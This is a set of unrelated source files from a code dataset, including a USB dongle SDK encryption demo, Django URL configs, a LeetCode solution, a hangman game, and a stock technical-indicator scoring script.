//增强算法是一个标准的TEA算法,在该例子中有对应的解密函数StrDec,对应的加密函数我为StrEnc\n\n\n#使用增强算法一对二进制数据进行加密\t\t\n\t\t \n InBufArray=c_ubyte*8\n OutBufArray=c_ubyte*8\n InBuf=InBufArray()\n OutBuf=OutBufArray()\n for n in range(0,8):\n InBuf[n]=(n)\n \n ret = Psyunew6.Cal(InBuf, OutBuf, KeyPath)\n if ret != 0:\n print('加密二进制数据失败\\n') \n else:\n print('已成功对二进数据进行加密,加密后结果是:%02X%02X%02X%02X%02X%02X%02X%02X\\n'%(OutBuf[0],OutBuf[1],OutBuf[2],OutBuf[3],OutBuf[4],OutBuf[5],OutBuf[6],OutBuf[7]))\n \n #增强算法是一个标准的TEA算法,在该例子中有对应的源码\n #加密代码为EncBySoft及解密函数DecBySoft\n\n#设置增强算法密钥二\n#注意:密钥为不超过32个的0-F字符,例如:1234567890ABCDEF1234567890ABCDEF,不足32个字符的,系统会自动在后面补0\n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<32 :\n print( '锁的扩展版本少于32,不支持增强算法二')\n else:\n Key='ABCDEF1234567890ABCDEF1234567890'.encode('utf-8')\n ret = Psyunew6.SetCal_New(Key, KeyPath)\n if ret != 0:\n print('设置增强算法密钥错误\\n')\n else:\n print('已成功设置了增强算法密钥\\n')\n\t\t\n\t\n\t##使用增强算法二对字符串进行加密\n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0 :\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if ver.value<32 :\n print( '锁的扩展版本少于32,不支持增强算法二')\n else:\n InString = '加密锁'.encode('utf-8')\n mylen = len(InString)+1\n if mylen < 8 :\n mylen = 8 \n outstring = create_string_buffer((mylen* 2+1))#//注意,这里要加1一个长度,用于储存结束学符串\t\t\n ret = Psyunew6.EncString_New(InString, outstring, KeyPath)\n if ret != 0:\n print('加密字符串出现错误\\n') \n else:\n print('已成功对字符串进行加密,加密后的字符串为:%s\\n' % outstring.value)\n\n#使用增强算法二对二进制数据进行加密\t\t \n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0:\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if verEx.value<32:\n print( '锁的扩展版本少于32,不支持增强算法二')\n else:\n InBufArray_2=c_ubyte*8\n OutBufArray_2=c_ubyte*8\n InBuf=InBufArray_2()\n OutBuf=OutBufArray_2()\n for n in range(0,8):\n InBuf[n]=(n)\n \n ret = Psyunew6.Cal_New(InBuf, OutBuf, KeyPath)\n if ret != 0:\n print('加密二进制数据失败\\n') \n else:\n 
print('已成功对二进数据进行加密,加密后结果是:%02X%02X%02X%02X%02X%02X%02X%02X\\n'%(OutBuf[0],OutBuf[1],OutBuf[2],OutBuf[3],OutBuf[4],OutBuf[5],OutBuf[6],OutBuf[7]))\n\t\t\t\n #增强算法是一个标准的TEA算法,在该例子中有对应的源码\n #加密代码为EncBySoft及解密函数DecBySoft\t\t\t\n\n\n if ver.value < 33 :\n print('锁的版本少于33,不支持SM2算法')\n exit()\n\t\t \n#以下代码只支持智能芯片F2K\n#返回芯片唯一ID\n chipid=create_string_buffer(33)\n ret = Psyunew6.GetChipID(chipid,KeyPath)\n if ret != 0:\n print('返回芯片唯一ID时出现错误')\n exit()\n print('已成功返回芯片唯一ID:%s'%(chipid.value))\n\n PriKey=create_string_buffer(SIGN_LEN)\n PubKeyX=create_string_buffer(SIGN_LEN)\n PubKeyY=create_string_buffer(SIGN_LEN)\n Sm2UserName=create_string_buffer(SM2_USENAME_LEN)\n OutString=create_string_buffer(SIGN_LEN)\n\n\n#生成密钥对\n ret = Psyunew6.YT_GenKeyPair(PriKey, PubKeyX, PubKeyY, KeyPath)\n if ret!=0:\n print('生成密钥对时错误。')\n\n print('生成密钥对成功。PriKey:%s,PubKeyX:%s,PubKeyY:%s'%(PriKey.value, PubKeyX.value, PubKeyY.value))\n#设置密钥对到锁中\n ret = Psyunew6.Set_SM2_KeyPair(PriKey, PubKeyX, PubKeyY, 'mysofkey', KeyPath)\n if ret!=0:\n print('设置密钥时错误。错误码')\n\n print('设置密钥成功。')\n#设置Pin码\n\t\n ret = Psyunew6.YtSetPin('123'.encode('utf-8'),'123'.encode('utf-8'),KeyPath)\n if ret!= 0:\n print('设置Pin码时出现错误')\n exit()\n print('已成功设置了设置Pin码.' 
)\n\n#使用默认的PIN码\n Pin='123'.encode('utf-8')\n\t\n\t#对数据进行加密\n Instring='加密锁'.encode('utf-8')\n inlen = len(Instring) + 1\n\n ##分配空间\n outlen = (inlen / MAX_ENCLEN + 1) * SM2_ADDBYTE + inlen\n OutString = create_string_buffer((outlen * 2 + 1))\n\n ret = Psyunew6.SM2_EncString(Instring,OutString,KeyPath)\n if ret != 0:\n print('对数据进行加密时出现错误') \n exit() \n print('已成功对数据进行加密:%s', OutString.value)\n\n#对数据进行解密,使用默认的PIN码\n inlen = len(OutString) / 2\n outlen = (inlen - (inlen / MAX_DECLEN + 1) * SM2_ADDBYTE + 1)\n OutString_Dec = create_string_buffer(outlen)\n ret = Psyunew6.SM2_DecString(OutString,OutString_Dec,Pin,KeyPath)\n if ret != 0 :\n print('对数据进行解时出现错误')\n exit()\n print('已成功对数据进行解密:%s'%(OutString_Dec.value))\n\n ret = Psyunew6.Get_SM2_PubKey(PubKeyX, PubKeyY, Sm2UserName, KeyPath)\n if ret!=0:\n print('从锁中获取公钥时错误。')\n exit\n print('从锁中获取公钥:PubKeyX:%s,PubKeyY:%s,Sm2UserName:%s'%(PubKeyX.value, PubKeyY.value, Sm2UserName.value))\n\n#以下代码只支持iKey系列\n if Psyunew6.NT_GetVersionEx(byref(verEx),KeyPath) != 0:\n print( '返回加密锁扩展版本号错误\\n')\n exit()\n if verEx.value < 38:\n print('锁的扩展版本少于38,不支持带U盘功能')\n exit()\n if Psyunew6.SetUReadOnly(KeyPath) != 0:\n print('设置iKey为只读模式时错误')\n exit()\n if Psyunew6.SetHidOnly(true, KeyPath) != 0:\n print('设置iKey不显示盘符时错误')\n exit()\n print('设置成功,需要重新插入iKey才生效。')\n\n if 'Linux' in platform.system():\n Psyunew6.CloseUsbHandle(KeyPath)#关闭USB设备\n \nelse: \n\tprint('未找到加密锁,请插入加密锁后,再进行操作。\\n')\n\n\n\n\n\n \n \n\t\t\n","sub_path":"test_py3.py","file_name":"test_py3.py","file_ext":"py","file_size_in_byte":17258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324490846","text":"\"\"\"meiduo_mall URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n# 测试日志\nfrom django.http import HttpResponse\n\n\ndef test(request):\n # 1.导入日志包\n import logging\n # 2. 创建/获取\n logger = logging.getLogger('django')\n # 3. 根据日志等级来记录日志\n logger.error('Error')\n logger.info('Yes')\n logger.warning('119')\n return HttpResponse('ha')\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n # url(r'test/$',test),\n url(r'^', include(('apps.users.urls', 'apps.users'), namespace='users')),\n # 跳转首页\n url(r'^', include(('apps.contents.urls', 'apps.contents'), namespace='contents')),\n # 图片验证\n url(r'^', include(('apps.verifications.urls', 'apps.verifications'), namespace='verifications')),\n # QQ登录\n url(r'^', include(('apps.oauth.urls', 'apps.oauth'), namespace='oauth')),\n # 省市区\n url(r'^', include(('apps.areas.urls', 'apps.areas'), namespace='areas')),\n # 购物车\n url(r'^', include(('apps.carts.urls', 'apps.carts'), namespace='carts')),\n\n url(r'^', include(('apps.goods.urls', 'apps.goods'), namespace='goods')),\n # 支付\n url(r'^', include(('apps.orders.urls', 'apps.orders'), namespace='orders')),\n # 去支付\n url(r'^', include(('apps.payment.urls', 'apps.payment'), namespace='payment')),\n # JWT\n url(r'^meiduo_admin/', include('apps.meiduo_admin.urls', namespace='meiduo_admin')),\n\n]\n","sub_path":"meiduo_mall/meiduo_mall/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457126729","text":"from typing import List\nfrom Leetcode.utils import perf\n\nimport 
collections\n\n\nclass Solution:\n # tc: O((Words * (Words - 1)) / 2 * WordLen) = O(Words^2 * WordLen)\n # sc: O(V^2)\n @perf\n def alienOrder(self, words):\n alphabet = set(''.join(words))\n relative_adj = collections.defaultdict(set)\n freq_child = collections.defaultdict(int)\n\n for w1, w2 in zip(words, words[1:]):\n for ch1, ch2 in zip(w1, w2):\n if ch1 != ch2:\n # add only if b is not already a neighbor of a\n if ch2 not in relative_adj[ch1]:\n relative_adj[ch1].add(ch2)\n freq_child[ch2] += 1\n\n break\n\n # sorting is not required, but necessary to compare results reliably\n q = collections.deque(sorted([ l for l in alphabet if l not in freq_child ]))\n ans = []\n\n while q:\n letter = q.popleft()\n ans.append(letter)\n\n for child in relative_adj[letter]:\n freq_child[child] -= 1\n\n if freq_child[child] == 0:\n q.append(child)\n\n if len(ans) == len(alphabet):\n return ''.join(ans)\n else:\n return ''\n","sub_path":"Leetcode/alien_dictionary/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"305009234","text":"from __future__ import annotations\nfrom typing import Callable\nimport bjoern\nfrom .http.request import Request\nfrom .http.response import Response\nfrom .http import Router\nfrom .http import Route\n\n\nclass Application:\n \"\"\"\n WSGI Application\n \"\"\"\n servers: list = []\n operations: list = []\n router: Router\n\n def _boot(self):\n self.router = Router()\n for handler in self.operations:\n operation = handler.get_opyapi_annotation()\n self.router.add_route(operation.method, operation.route, handler)\n\n @classmethod\n def add_server(cls, server):\n cls.servers.append(server)\n\n @classmethod\n def add_operation(cls, operation):\n cls.operations.append(operation)\n\n @classmethod\n def get_server(cls, server_id: str):\n for server in cls.servers:\n annotation = server.get_opyapi_annotation()\n if 
annotation.id == server_id:\n return server\n\n def __call__(self, env, start):\n request = Request.from_wsgi(env)\n result = self.router.match(request.method, request.path)\n if not result:\n start(\"404 Not Found\", [(\"Content-Type\", \"text/plain\")])\n return b\"\"\n start(\"200 OK\", [(\"Content-Type\", \"text/plain\")])\n request.route = result[0]\n return str.encode(str(result[1](request)))\n\n @classmethod\n def run(\n cls, server_id: str, runner: Callable = bjoern.run\n ):\n server = cls.get_server(server_id)\n if server is None:\n raise ValueError(f\"Server `{server_id}` was not recognized. \"\n f\"Are you sure you have decorated class with @Server(id='{server_id}' ...) decorator\")\n server_details = server.get_opyapi_annotation()\n app = cls()\n app._boot()\n runner(app, server_details.host, server_details.port)\n","sub_path":"opyapi/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392229503","text":"import os\n\n\n# creates a dictionary of pronouns\n# INPUT: \n# OUTPUT: a dictionary where the keys are gendered pronouns and the values\n# are the opposite gendered equivalent\ndef getPronounDict():\n\n \n module_dir = os.path.dirname(__file__) \n file_path = os.path.join(module_dir, \"pronoun_corpus/\" + \"pronouns.txt\")\n\n # open and read the file that contains all of the pronouns\n pronounFile = open(file_path,\"r\")\n rawContents = pronounFile.read()\n\n # process the raw contents into pairs of pronouns\n pairs = processCorpus(rawContents)\n\n # add every pair to the dictionary\n pronounDict = dict()\n for pair in pairs:\n addPairToDict(pair, pronounDict)\n\n return pronounDict\n\n# processes the raw contents into ann array of pairs\n# INPUT: a string all the pronouns\n# OUTPUT: and nested array of pronoun pairs\ndef processCorpus(rawContents):\n\n # split the pairs by line\n unprocessedPairs = 
rawContents.split(\"\\n\")\n\n # split each word in pairs by commas\n pairs = []\n for pair in unprocessedPairs:\n pairs.append(pair.split(\",\"))\n\n return pairs \n\n# add a pair of pronouns to the dictionary\n# INPUT: an array of two pronouns, the pronoun dictionary\n# OUTPUT: \ndef addPairToDict(pair, pronounDict):\n bothWays = True\n\n # check to see if there's an extra element denoting the pair should only \n # be inputted one way\n if(len(pair) == 2):\n word1, word2 = pair\n elif(len(pair) == 3):\n word1, word2, holder = pair\n bothWays = False\n else:\n return\n\n # create dictionary entries one or both ways\n createEntries(word1, word2, pronounDict)\n if(bothWays):\n createEntries(word2, word1, pronounDict)\n\n# get the plural of a word\n# INPUT: a word\n# OUTPUT: the plural of that word\ndef getPlural(word):\n\n # if the word is a mr, mrs, etc, skip it\n if(word == \"mr\" or word == \"ms\" or word == \"mrs\"):\n return word\n\n # if the word ends in \"ss\", as in \"countess\", add \"es\"\n if(len(word) > 2 and (word[-2:] == \"ss\" or word[-2:] == \"SS\")):\n return word + \"es\"\n\n # otherwise just add \"s\"\n else:\n return word + \"s\"\n\n# enter different permutations of the word into the dictionary\n# INPUT: the word, its opposite gendered equivalent, the pronoun dictionary\n# OUTPUT: \ndef createEntries(word, oppword, pronounDict):\n\n \n # account for the word in different capitalizations\n words = [word, word.capitalize(), word.upper()]\n oppWords = [oppword, oppword.capitalize(), oppword.upper()]\n\n\n for i in range(len(words)):\n word = words[i]\n oppword = oppWords[i]\n pronounDict[word] = oppword\n\n # add the plural version of the word as well\n # make sure its uppercase if the rest of the word is\n if(i == len(words)-1):\n pronounDict[getPlural(word).upper()] = getPlural(oppword).upper()\n else:\n pronounDict[getPlural(word)] = 
getPlural(oppword)\n","sub_path":"genderbender/pronounDictMaker.py","file_name":"pronounDictMaker.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"513462342","text":"\"\"\"\nFile: hangman.py\nName: 林坤毅 Jordan\n-----------------------------\nThis program plays hangman game.\nUsers sees a dashed word, trying to\ncorrectly figure the un-dashed word out\nby inputting one character each round.\nIf the user input is correct, show the\nupdated word on console. Players have N_TURNS\nchances to try and win this game.\n\"\"\"\n\n\nimport random\n\n# This constant controls the number of guess the player has.\nN_TURNS = 7\n\n\ndef main():\n \"\"\"\n This program will first import a random word from Jerry's function 'random_word()'\n Second, it will show a hint contains only hyphens(-), which the number of hyphens will match the length of answer.\n Last, user can start playing the hangman game with only 7 choices to make mistake.\n \"\"\"\n answer = random_word()\n header(answer)\n input_ch(answer, N_TURNS)\n\n\ndef input_ch(answer, nturn):\n \"\"\"\n :param answer: str, the answer for this hangman game.\n :param nturn: the number of guesses left.\n \"\"\"\n x = old_word(answer)\n # temporary answer\n while True:\n result = 'no'\n input_ch = input('Your guess: ')\n finalinput = input_ch.upper()\n ch_or_not_ch = finalinput.isalpha()\n\n if ch_or_not_ch != True or len(finalinput) != 1:\n # format is wrong\n print('illegal format.')\n\n else:\n # format is right\n if nturn > 1:\n for ch in answer:\n if finalinput == ch:\n temp = replace(x, ch, answer)\n x = temp\n # change the temporary answer x\n result = 'yes'\n # setting 'result = yes' is for repeat characters in answer\n # If I add you are correct... 
here, it will repeat for the same character in answer\n\n if result == 'yes':\n if x == answer:\n print('You are correct!')\n print('You win!!')\n print('The word was: ' + answer)\n break\n print('You are correct!')\n print('The word looks like: ' + temp)\n print('You have ' + str(nturn) + ' guesses left.')\n\n else:\n nturn -= 1\n print('There is no ' + str(finalinput) + '\\'s in the word.')\n print('The word looks like:' + x)\n print('You have ' + str(nturn) + ' guesses left.')\n\n elif nturn == 1:\n print('There is no ' + str(finalinput) + '\\'s in the word.')\n print('You are completely hung :(')\n print('The word was: ' + answer)\n break\n\n\ndef replace(temporaryans, enterword, answer):\n \"\"\"\n :param temporaryans: str, temporary answer.\n :param enterword: str, the character that user guesses.\n :param answer: str, the answer for this hangman game.\n :return: str, the temporary answer after hyphens replacement.\n \"\"\"\n # s = replace('-----', 'A', answer)\n while True:\n i = answer.find(enterword)\n if i >= 0:\n y = temporaryans[:i]\n # ---\n y += enterword\n # ---A\n y += temporaryans[i+1:]\n # ---A-\n temporaryans = y\n answer = answer[:i] + '-' + answer[i+1:]\n else:\n ans = y\n break\n return ans\n\n\ndef old_word(answer):\n \"\"\"\n :param answer: str, the answer for this hangman game.\n :return: str, hyphens(-).\n \"\"\"\n ans = \"\"\n for i in range(len(answer)):\n ans += '-'\n return ans\n\n\ndef header(answer):\n \"\"\"\n :param answer: str, the answer for this hangman game.\n :return: str, Hints for the hangman game.\n \"\"\"\n n = \"\"\n for i in range(len(answer)):\n n = n + '-'\n print('The word looks like: ' + n)\n print('You have 7 guesses left.')\n\n\ndef random_word():\n num = random.choice(range(9))\n if num == 0:\n return \"NOTORIOUS\"\n elif num == 1:\n return \"GLAMOROUS\"\n elif num == 2:\n return \"CAUTIOUS\"\n elif num == 3:\n return \"DEMOCRACY\"\n elif num == 4:\n return \"BOYCOTT\"\n elif num == 5:\n return \"ENTHUSIASTIC\"\n 
elif num == 6:\n return \"HOSPITALITY\"\n elif num == 7:\n return \"BUNDLE\"\n elif num == 8:\n return \"REFUND\"\n\n##### DO NOT EDIT THE CODE BELOW THIS LINE #####\nif __name__ == '__main__':\n main()\n","sub_path":"stanCode_Projects/hangman_game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433677216","text":"#Given: Type of TI and the relevant data for that particular TI\n#Output: A Strength Estimate for the TI on a range of -10 to +10\n#Meanwhile: Plot bhi kar lo us ko\n#data format : {'Date':np.array, 'Open':np.array, 'High':np.array 'Low':np.array, 'Close':np.array }\nimport talib\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport plotly.plotly as py\nimport plotly.graph_objs as go \nimport plotly.tools as tools\nimport plotly.io as pio\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\n\ndef generate_freq_dist(data):\n\tret = plt.hist(data,bins=20,density=True,stacked = True)\n\t# print (ret)\n\t# plt.show()\n\treturn ret\n\ndef get_strength_EMA(data):\n\t#Exponential Moving Average applied on closing prices. 
Only default value of timeperiod used for now.\n\top = talib.EMA(data['Close'])\n\n\t#plot\n\tlist_traces = []\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op, name = 'momentum histogram'))\n\tlist_traces.append(go.Candlestick(\n\t\tx=data['Date'],\n\t\topen = data['Open'],\n\t\thigh = data['High'], \n\t\tlow = data['Low'], \n\t\tclose = data['Close'], \n\t\t)\n\t)\n\t# list_traces.append(go.Candlestick(\n\t# \tx=data['Date'][450:],\n\t# \topen = data['Open'][450:],\n\t# \thigh = data['High'][450:], \n\t# \tlow = data['Low'][450:], \n\t# \tclose = data['Close'][450:],\n\t# \tincreasing = dict(\n\t# \t\tfillcolor = 'blue'),\n\t# \tdecreasing = dict(\n\t# \t\tfillcolor = 'white')\n\t# \t))\n\tfig = go.Figure(data = list_traces)\n\tplot(fig)\n\n\top = np.array(op)\n\tfinite_diff = np.diff(op)\n\tprint (finite_diff)\n\t# score = finite_diff[-1] * 10 / max(abs(np.nanmax(finite_diff)), abs(np.nanmin(finite_diff)))\n\tscore = finite_diff[-1]\n\tif score > 10:\n\t\tscore = 10\n\telif score < -10:\n\t\tscore = -10\n\treturn score,fig\n\ndef get_strength_DEMA(data):\n\treturn get_strength_EMA(data)\n\ndef get_strength_WILLR(data):\n\t#WILLR = (Highest Hgh - Close)/(Highest High - Lowest Lowest)\n\top = talib.WILLR(data['High'],data['Low'], data['Close'])\n\n\t#plot\n\tlist_traces=[]\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op, name = 'Williams %R'))\n\tfig = go.Figure(data=list_traces)\n\tplot(fig)\n\n\t\n\t#+5 for WILLR < -80 \n\t#-5 for WILLR > -20\n\t#+5 for both price and indicator going up\n\t#-5 for both price and indicator going down\n\tscore = 0\n\tclosing_price = np.array(data['Close'])\n\top = np.array(op)\n\tif (closing_price[-1] < -80):\n\t\tscore += 5\n\telif(closing_price[-1] > -20):\n\t\tscore += -5\n\tif (closing_price[-1] - closing_price[-2] > 0):\n\t\tif(op[-1] - op[-2] > 0):\n\t\t\tscore += 5\n\telif(closing_price[-1] - closing_price[-2] < 0):\n\t\tif(op[-1] - op[-2] < 0):\n\t\t\tscore += -5\n\n\treturn score,fig\n\ndef 
get_strength_RSI(data):\n\t'''\n\t1)if current price is on the rise, we look for most recent maxima and last two minimas. \n\t\tif the most recent maxima and the current value form a +ve slope, Add +5 to the score, \n\t\tif the last two minimas form a +ve slope, add +5\n\t2)\n\t'''\ndef get_strength_ADX(data):\n\top = np.array(talib.ADX(data['High'], data['Low'], data['Close']))\n\tplus_DI = np.array(talib.PLUS_DI(data['High'], data['Low'], data['Close']))\n\tminus_DI = np.array(talib.MINUS_DI(data['High'], data['Low'], data['Close']))\n\t\n\t#plots\n\tlist_traces = []\n\tlist_traces.append(go.Scatter(x=data['Date'], y=op, name= 'ADX'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y=plus_DI, name= '+DI'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y=minus_DI, name= '-DI'))\n\tfig = go.Figure(data=list_traces)\n\tplot(fig)\n\n\t#score calculation\n\tscore=0\n\tif (op[-1]>20):\n\t\tif(plus_DI[-1] > minus_DI[-1]):\n\t\t\tscore = (op[-1]-20)*1.5\n\t\t\tif score>10:\n\t\t\t\tscore = 10\n\t\telse:\n\t\t\tscore = (op[-1]-20)*-1.5\n\t\t\tif score<-10:\n\t\t\t\tscore = -10\n\treturn score,fig\n\ndef get_strength_MACD(data):\n\t#we need only the close data for MACD analysis\n\top = talib.MACD(data['Close'])\n\thist = np.array(op[2]);\n\n\t#Get the MACD plot. 
\"Intend to later: add the pricing chart above the macd chart\"\n\tlist_traces=[]\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[0], name = 'macd'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[1], name = 'signal line'))\n\tlist_traces.append(go.Bar(x=data['Date'], y= op[2], name = 'momentum histogram'))\n\tfig = go.Figure(data=list_traces)\n\n\tplot(fig)\n\n\t# print (data['Date'][np.nanargmax(np.array(op[2]))])\n\tminm = np.nanmin(hist)\n\tmaxm = np.nanmax(hist)\n\t\n\t#separating the positive and negative values\n\t#from the histogram obtained from the MACD calculation\n\tpositives = []\n\tnegatives = []\n\tfor t in hist:\n\t\tif t>0 and not np.isnan(t):\n\t\t\tpositives.append(t)\n\t\telif not np.isnan(t):\n\t\t\tnegatives.append(t)\n\tpositives = np.array(positives)\n\tnegatives = np.array(negatives)\n\tprint (len(positives),len(negatives))\n\n\tpositive_freq_dist = generate_freq_dist(positives)\n\tnegative_freq_dist = generate_freq_dist(negatives)\n\n\tfor i in range(len(positive_freq_dist[0])):\n\t\tif(positive_freq_dist[0][i]>0.015) and i!=0:\n\t\t\tmaxm = positive_freq_dist[1][i]\n\n\tfor i in range(len(negative_freq_dist[0])):\n\t\tif(negative_freq_dist[0][-1 + -1*i] > 0.015):\n\t\t\tminm = negative_freq_dist[1][-1 + -1*i]\n\n\n\tif hist[-1]>=0:\n\t\tcurrent_score = hist[-1]*10/maxm\n\t\tif current_score>10:\n\t\t\tcurrent_score = 10\n\telse:\n\t\tcurrent_score = hist[-1]*-10/minm\n\t\tif current_score <-10:\n\t\t\tcurrent_score = -10\n\n\tprint ('curr score = ' + str(current_score))\n\treturn current_score,fig\n\n\ndef get_strength_BBANDS(data):\n\n\top = talib.BBANDS(data['Close'])\n\ttp = (data['High'] + data['Low'] + data['Close'])/3.0\n\n\tlist_traces=[]\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[0], name = 'macd'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[1], name = 'signal line'))\n\tlist_traces.append(go.Scatter(x=data['Date'], y= op[2], name = 'momentum 
histogram'))\n\tlist_traces.append(go.Candlestick(x=data['Date'],open = data['Open'], high = data['High'], low = data['Low'], close = data['Close']))\n\tfig = go.Figure(data=list_traces)\n\tplot(fig)\n\ttp = np.array(tp)\n\top = np.array(op)\n\tstrength = 0\n\tif tp[-1] > op[1][-1]:\n\t\tstrength = (op[1][-1] - tp[-1])*10/(op[0][-1] - op[1][-1])\n\telse:\n\t\tstrength = (tp[-1] - op[1][-1])*10/(op[2][-1] - op[1][-1])\n\tprint (strength)\n\treturn strength,fig\t\t\t\n\n\ndef plot_candlestick(stockData):\n\tohlc=stockData.getOhlc()\n\ttrace_cs = go.Ohlc(x=ohlc['Date'],\n\t open=ohlc['Open'],\n\t high=ohlc['High'],\n\t low=ohlc['Low'],\n\t close=ohlc['Close'], name='Candlestick Pattern')\n\n\tdata = [trace_cs]\n\tfig = go.Figure(data=data)\n\tplot(fig)\n\ndef get_ti_strength(ti_name,data):\n\t# try:\n\tscore,fig = eval('get_strength_' + ti_name)(data)\n\tprint (score)\n\t# plot(fig,output_type = 'div', filename = temp_div)\n\t# plot_candlestick(data)\n\treturn score,plot(fig,\n include_plotlyjs=False,\n output_type='div')\n\t# except:\n\t# \tprint (e)\n\t# \tprint ('Invalid Technical Indicator')\n\n\n# data = pd.read_csv('TCS.BO.csv',usecols=['Date','Open', 'High', 'Low', 'Close']);\n# # print (data)\n# get_ti_strength('EMA',data)","sub_path":"functions/strength_ti.py","file_name":"strength_ti.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"4224951","text":"\n\nclass DoublyLinkedListNode:\n def __init__(self, x, p= None,n= None):\n self.val = x\n self.prev = p\n self.next = n\n\n\n# Definition for ListNode\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef doublyLinkedCircularList(head):\n\n curr = head\n prev = None\n headDouble = DoublyLinkedListNode(0)\n tailDouble = headDouble\n #new list\n\n\n while curr:\n newNode = DoublyLinkedListNode(curr.val, tailDouble, None)\n tailDouble.next = newNode\n tailDouble = newNode\n curr = 
curr.next\n \n headDouble = headDouble.next\n if headDouble:\n tailDouble.next = headDouble\n headDouble.prev = tailDouble\n \n return headDouble\n\n\ndef main():\n \n head = ListNode(0)\n tail = head\n for i in [1,2,3,4,5,6]:\n tail.next = ListNode(i)\n tail = tail.next\n\n hd = doublyLinkedCircularList(head)\n\n curr = hd\n for i in range(10):\n print(curr.val, end = '->')\n curr = curr.next\n print()\n # print('---------')\n curr = hd\n for i in range(10):\n print(curr.val, end = '->')\n curr = curr.prev\n\n\nif __name__ == '__main__':\n main()","sub_path":"doublyLinkedList_crio.py","file_name":"doublyLinkedList_crio.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"181608267","text":"\nfrom django.urls import path,include\nfrom . import views\napp_name='blog'\nurlpatterns = [\n\n path('', views.all_blog, name='all_blogs'),\n path('/', views.detail, name='detail'),\n path('somehtml',views.somehtml,name='some')\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343996947","text":"# encode=utf-8\nimport urllib.request\nimport lxml\n\nurl = 'https://talent.baidu.com/baidu/web/httpservice/userCheckLogin'\n# url = 'https://www.baidu.com'\nurl_agent = ''\nresponse = urllib.request.urlopen(url)\nhtml = response.read();\nprint('html = %s' % html)\n\n\n\n","sub_path":"urltest.py","file_name":"urltest.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481902987","text":"from django.urls import path\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom .views import (\n UserInfoDetailView, UserInfoUpdateView, UserInfoListView,\n SignUpView, AddToFriendsView,\n)\n\napp_name = 'users'\n\nurlpatterns = [\n path('', 
UserInfoListView.as_view(), name='user_list'),\n path('/', UserInfoDetailView.as_view(), name='user_detail'),\n path('/edit/', UserInfoUpdateView.as_view(), name='user_edit'),\n path('add-to-friends/', AddToFriendsView.as_view(), name='add_to_friends'),\n path('signup/', SignUpView.as_view(), name='signup'),\n path('login/', LoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(), name='logout'),\n]\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426981492","text":"# collection of functions to use for analysis\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sklearn.utils import resample\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport matplotlib.pyplot as plt\n\nimport datefinder as datefi\nimport regex as re\n\nfrom textblob import TextBlob\n\n# ***** some common constants ************\n\nfname_messages = 'messages.csv'\nfname_surveys = 'surveys.csv'\nfname_outbound_topic_model = 'lda_outbound_topic_model.sav'\nfname_inbound_topic_model = 'lda_inbound_topic_model.sav'\n\nn_samples = 2000 # parameters for topic modeling\nn_features = 1000\nn_components = 15\nn_top_words = 10\n\ndate_pattern = r'\\b(?i)(?<=date|court|report|on|for)\\s*(\\S+\\s*\\S+\\s*\\S+\\s*\\S+\\s*\\S+)'\naddress_pattern = 